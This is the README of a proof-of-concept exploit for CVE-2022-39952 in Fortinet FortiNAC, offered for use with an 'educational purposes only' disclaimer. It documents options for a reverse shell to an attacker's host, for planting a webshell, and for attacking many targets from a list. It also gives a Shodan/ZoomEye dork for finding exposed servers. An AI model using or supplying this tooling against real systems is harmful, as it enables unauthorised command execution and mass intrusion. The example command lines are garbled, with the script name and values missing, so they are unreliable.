# FortiNAC CVE-2022-39952

## PoC for CVE-2022-39952 affecting Fortinet FortiNAC.

> This exploit allows an attacker to execute arbitrary commands on the FortiNAC server. It is based on the PoC developed by horizon3ai, with additional options for targeting multiple hosts.

> Disclaimer: This exploit is for educational purposes only. Please use responsibly and with permission.

## Usage:

```
usage: [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell
```

To use this exploit, you must have Python 3.x installed on your system.

## Requirements:
    Python 3.x
    requests module
    concurrent.futures module

## Examples:

### Execute a reverse shell on a single target:
```
$ python -t -lh -lp 4444
```

### Execute a webshell on a single target:
```
$ python -t
```

### Execute a webshell on multiple targets from a list:
```
$ python -l targets.txt
```

## Note:

> This exploit has only been tested on a limited number of targets, so its effectiveness may vary. The dork for finding potential targets on ZoomEye and Shodan is:

`title:"FortiNAC" +"JSESSIONID"`